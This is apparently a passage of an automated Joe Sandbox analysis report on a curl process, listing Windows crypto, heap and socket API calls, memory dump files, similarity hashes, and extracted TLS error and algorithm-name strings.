                                APIs
                                • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 008AC769
                                • CryptGetHashParam.ADVAPI32(00000010,00000002,?,00000010,00000000), ref: 008AC782
                                • CryptDestroyHash.ADVAPI32(00000010), ref: 008AC790
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 008AC79D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                • String ID:
                                • API String ID: 2110207923-0
                                • Opcode ID: 2db4a3f485903204210ca8c0527f1096b3145d719bfeeaa894266327c6233b1a
                                • Instruction ID: 72ebaed4885684218051e46a2c051b439a4e7ad65078028899751305fd8d6547
                                • Opcode Fuzzy Hash: 2db4a3f485903204210ca8c0527f1096b3145d719bfeeaa894266327c6233b1a
                                • Instruction Fuzzy Hash: ABF04935400A08FFEB219F49DD09D9BBBB9FB81B01B508128F556A2460C3319E41EB90
                                APIs
                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 008A6417
                                • CryptGenRandom.ADVAPI32(?,?,?), ref: 008A6430
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 008A6445
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 40200b7e2f1c746a553c9bf60beec46faca2aa527e7a4b879170fa3fa188813e
                                • Instruction ID: 88352ad7e2e107d65de26ba87320a558db99bd516dfebbe9b45a2765f4ac11fe
                                • Opcode Fuzzy Hash: 40200b7e2f1c746a553c9bf60beec46faca2aa527e7a4b879170fa3fa188813e
                                • Instruction Fuzzy Hash: C7F05E72600548FBEB319B56DD0EF9B7F78FB89B50F144114F605E6064E6708910E795
                                APIs
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,754C0130,?,008AC800,00000000), ref: 008AC6F4
                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000004,?,008AC800,00000000), ref: 008AC710
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,008AC800,00000000), ref: 008AC71D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Crypt$Context$AcquireCreateHashRelease
                                • String ID:
                                • API String ID: 4045725610-0
                                • Opcode ID: 96df3dda9054c3aa7bf5f9515de3e9998d9ff50f763401d1041cdc38f3393eb3
                                • Instruction ID: ff1b71464306324b9a5ee6ae56c6a699649dba1beac7e2a207591cfb58362b91
                                • Opcode Fuzzy Hash: 96df3dda9054c3aa7bf5f9515de3e9998d9ff50f763401d1041cdc38f3393eb3
                                • Instruction Fuzzy Hash: 16F03931200648FAFB306B6BEC0CF977FACFBC6B90B100429F645D5460EB61A9019AA4
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bcfdaf01c36738080dc595fb3c802af0ec7ac3a850a58622f5fe5ef8645ff187
                                • Instruction ID: 3a45703c9e27e47e1bcf74a9e80e3c7369a06a689e0d2d5ae0f5578557521d7d
                                • Opcode Fuzzy Hash: bcfdaf01c36738080dc595fb3c802af0ec7ac3a850a58622f5fe5ef8645ff187
                                • Instruction Fuzzy Hash: F2D23935604205DFCB1ACE68C584AA83BA2FB85354F18C1B9E80ECF75ED731DA40DB66
                                APIs
                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,?,?,?,008AF8CD,?,00000000,?,00000000,?,?,008A9C33), ref: 008AF834
                                • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?,?,008AF8CD,?,00000000,?,00000000,?,?,008A9C33,?), ref: 008AF84B
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Crypt$AcquireContextCreateHash
                                • String ID:
                                • API String ID: 1914063823-0
                                • Opcode ID: 82c5bdbcedd7b01bb8eb1ea50d782fdca10543d4ec36f14e8fa1be2470d95338
                                • Instruction ID: ec2cc0f62c2bbe7a8496cc55be218ea9117ce03bb1228cc382db0254b11430f0
                                • Opcode Fuzzy Hash: 82c5bdbcedd7b01bb8eb1ea50d782fdca10543d4ec36f14e8fa1be2470d95338
                                • Instruction Fuzzy Hash: 86E0EC36240A98BBF7306AA7DC08E977FACFBC6B50B004029FB49D6451DA61A501C7B5
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008B1390
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-0
                                • Opcode ID: fdeb7f8b436e816350de60b7ee0966ceb3bc463584330f3216c0033fc95f6241
                                • Instruction ID: 4ce845b604900d8b28382d1ad44f57f243d8c3036a68a319d420d78a9cb4f72f
                                • Opcode Fuzzy Hash: fdeb7f8b436e816350de60b7ee0966ceb3bc463584330f3216c0033fc95f6241
                                • Instruction Fuzzy Hash: 71517FB1A006058BEB29CF59E8A5BEAB7F2FB48314F54843AD505EB352D3749900CF64
                                APIs
                                • CryptHashData.ADVAPI32(?,00000000,008A9C33,00000000,?,008AF8E1,?,?,008A9C33,00000000,?,00000000,?,?,008A9C33,?), ref: 008AC741
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CryptDataHash
                                • String ID:
                                • API String ID: 4245837645-0
                                • Opcode ID: adb28e010eb9c6d103e1ac4313d30c46f54a79b4fde9dc84c25c4fe6b0ab9b19
                                • Instruction ID: 5fdc43dd21008919e49cefcde1d21dc34874137f456691d9d6e27351ce64c0b6
                                • Opcode Fuzzy Hash: adb28e010eb9c6d103e1ac4313d30c46f54a79b4fde9dc84c25c4fe6b0ab9b19
                                • Instruction Fuzzy Hash: FCC0023614460CABCF015F84DC05F997BA9BB08711F048050BA1C4A571C772E5609B84
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_000516D0,008B11D5), ref: 008B16C3
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: fbfde730294aece8fa695d2485dda8d0c78aa8c924ff119662e7c6cb8315a9f1
                                • Instruction ID: a2563c84812f660c9e68582e4e796d65b8788ea9e2b032bc9fc6c21d39bca48e
                                • Opcode Fuzzy Hash: fbfde730294aece8fa695d2485dda8d0c78aa8c924ff119662e7c6cb8315a9f1
                                • Instruction Fuzzy Hash:
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 78a50b2bf41a33c6e6e97b2459417984ddd06d0392d3e8fb04d819813145c2a9
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 60112B7730018243D606CA2DD4B45FBA796FBEA32072D437AD042CB758DA23EB459908
                                APIs
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000), ref: 0087A230
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A238
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 0087A62C
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A63C
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A64C
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A654
                                • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A65F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLast_errno$strncpy
                                • String ID: %s (0x%08X)$%s - %s$0Lu@Ru@/Mu$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                • API String ID: 4135170618-2555483005
                                • Opcode ID: 8abfe76655f0a76bb3c432388d7f1e6e3d37d61006f04415a9db3a0957b90ed2
                                • Instruction ID: 776b8f883dd33918423fe3e955410e839ce98a4b9750157529fa456c95fa7d3a
                                • Opcode Fuzzy Hash: 8abfe76655f0a76bb3c432388d7f1e6e3d37d61006f04415a9db3a0957b90ed2
                                • Instruction Fuzzy Hash: 3881DC2060C68C97831C07E859A4F6D6774F7D430CB24D22AB70ADEB48D931CE8ABB13
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862464
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862472
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086247E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086248A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862496
                                  • Part of subcall function 00870E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00863167), ref: 00870E2C
                                  • Part of subcall function 00870E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00870E41
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008624AA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008624BE
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008624CA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008624D9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008624EB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008624FD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086250F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862521
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862533
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862545
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862557
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086256C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086257E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862590
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008625A2
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008625B4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008625C6
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008625D8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008625EA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008625FC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086260E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862620
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086263D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086264F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862661
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086267F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086268C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862699
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008626A4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008626D1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008626E3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008626F5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862707
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862719
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086272B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086273D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086274F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862761
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862773
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862785
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862797
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008627A9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008627BB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008627CD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008627DF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008627F4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862806
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862818
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086282A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086283C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086284E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862860
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862872
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862884
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862896
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008628A8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008628BA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008628CC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008628DE
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008628F0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862902
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862917
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862929
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086293B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086294A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008629D9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008629EB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008629FD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862A0F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862A21
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862A33
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: ace4387536a021b25f1063ca686cbf11affaa05ceefa1d532de2c098cbb5690e
                                • Instruction ID: 00e1f14814212946f2fd0dbf31dc26bd7aef0c2d3ebda95e75fc198258370ad0
                                • Opcode Fuzzy Hash: ace4387536a021b25f1063ca686cbf11affaa05ceefa1d532de2c098cbb5690e
                                • Instruction Fuzzy Hash: 8EF1EA75602E12EFDB8A5FA0D948B89FB21FF09701F008306F9295A262CB356571DFD6
                                APIs
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000000,?,0000001F), ref: 008A3B39
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,USE_STRONG_CRYPTO,00000011,0000001F), ref: 008A3B59
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,SCH_USE_STRONG_CRYPTO,00000015,?,?,?,0000001F), ref: 008A3B6E
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A3B8E
                                  • Part of subcall function 008A3B1A: ___from_strstr_to_strchr.LIBCMT ref: 008A345C
                                  • Part of subcall function 008A3B1A: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 008A349C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrstrncmp$strncpystrtol
                                • String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER$SCH_USE_STRONG_CRYPTO$USE_STRONG_CRYPTO
                                • API String ID: 3873730638-2313236003
                                • Opcode ID: 6143c124861c17c36eca1d4bd3fe861f85dde307c47d854c65a405229148973e
                                • Instruction ID: 21bad66552a8e31379e7fc48d15f7ed98a5c3f5b1f50f891db80d643f8fe4a78
                                • Opcode Fuzzy Hash: 6143c124861c17c36eca1d4bd3fe861f85dde307c47d854c65a405229148973e
                                • Instruction Fuzzy Hash: 2011E931A01B106BF7254A259C95B967789FF577B9F100025FD05EA781E760CB42C1E5
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0086A600
                                • ioctlsocket.WS2_32(?,8004667E,?), ref: 0086A637
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086A641
                                • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 0086A649
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
